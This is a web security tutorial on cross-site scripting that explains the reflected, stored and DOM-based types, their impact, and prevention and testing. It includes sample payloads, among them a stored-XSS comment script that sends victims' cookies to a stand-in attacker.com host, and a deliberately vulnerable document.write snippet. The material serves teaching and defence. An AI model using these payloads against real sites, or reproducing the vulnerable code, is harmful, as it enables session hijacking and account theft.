Cross-Site Scripting (XSS) Attacks

Cross-Site Scripting (XSS) is one of the most common web application vulnerabilities. It allows attackers to inject client-side scripts into web pages viewed by other users, potentially leading to session hijacking, credential theft, and other serious security issues.

Types of XSS Attacks

1. Reflected XSS

Reflected XSS occurs when malicious script is reflected off a web application to the victim’s browser. This typically happens when user input is immediately returned by a web application in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request.

Example:

https://example.com/search?q=<script>alert('XSS')</script>

If the application doesn’t properly sanitize the search parameter, the script will execute when the page loads.

2. Stored XSS

Stored XSS (also known as persistent XSS) occurs when the malicious script is stored on the target server, such as in a database, message forum, visitor log, or comment field. The victim then retrieves the malicious script from the server when they request the stored information.

Example:

<div class="comment">
  <strong>Attacker:</strong>
  Great article!
  <script>
    document.location='https://attacker.com/steal.php?cookie='+document.cookie
  </script>
</div>

3. DOM-based XSS

DOM-based XSS occurs when the vulnerability exists in client-side code rather than server-side code. The attack payload is executed as a result of modifying the DOM environment in the victim’s browser.

Example:

// Vulnerable code
const pos = document.URL.indexOf("name=") + 5;
document.write("Welcome, " + document.URL.substring(pos, document.URL.length));

Impact of XSS Attacks

XSS attacks can lead to:

1. Cookie theft - Stealing session cookies to impersonate users
2. Credential harvesting - Creating fake login forms to steal credentials
3. Keylogging - Recording keystrokes to capture sensitive information
4. Phishing - Redirecting users to malicious websites
5. Web defacement - Changing the appearance of websites
6. Malware distribution - Forcing downloads of malicious software

Prevention Techniques

1. Input Validation and Sanitization

Always validate and sanitize user input on the server side. Use whitelist validation when possible.

// Example of sanitizing input in JavaScript
function sanitizeInput(input) {
  return input.replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

2. Output Encoding

Encode output based on the context where it will be displayed:

• HTML context: < instead of <
• JavaScript context: \u003C instead of <
• CSS context: \3C instead of <
• URL context: %3C instead of <

3. Content Security Policy (CSP)

Implement Content Security Policy headers to restrict the sources from which scripts can be loaded:

Content-Security-Policy: script-src 'self' https://trusted-cdn.com

4. Use Modern Frameworks

Modern frameworks like React, Angular, and Vue automatically escape content by default, reducing the risk of XSS.

// React example - safe by default
function Comment({ data }) {
  return <div>{data.text}</div>; // Content is automatically escaped
}

5. HttpOnly and Secure Cookies

Set the HttpOnly flag on cookies to prevent JavaScript access:

Set-Cookie: sessionId=abc123; HttpOnly; Secure; SameSite=Strict

Testing for XSS Vulnerabilities

Manual Testing

1. Input fields: Try inserting simple payloads like <script>alert('XSS')</script>
2. URL parameters: Modify query parameters to include script tags
3. HTTP headers: Some applications reflect HTTP headers in the response
4. File uploads: Some file types can contain scripts that execute when viewed

Automated Testing

Tools for XSS detection:

1. OWASP ZAP
2. Burp Suite
3. XSStrike
4. Acunetix

Real-World XSS Examples

1. Twitter (2010): A stored XSS vulnerability allowed attackers to create tweets containing malicious JavaScript
2. Samy Worm on MySpace (2005): The first major XSS worm that infected over one million users
3. Yahoo Mail (2013): A stored XSS vulnerability allowed attackers to steal users’ cookies

Conclusion

XSS remains one of the most prevalent web application vulnerabilities. By understanding how these attacks work and implementing proper prevention techniques, developers can significantly reduce the risk of XSS in their applications.

References

1. OWASP XSS Prevention Cheat Sheet
2. Mozilla Web Security
3. Content Security Policy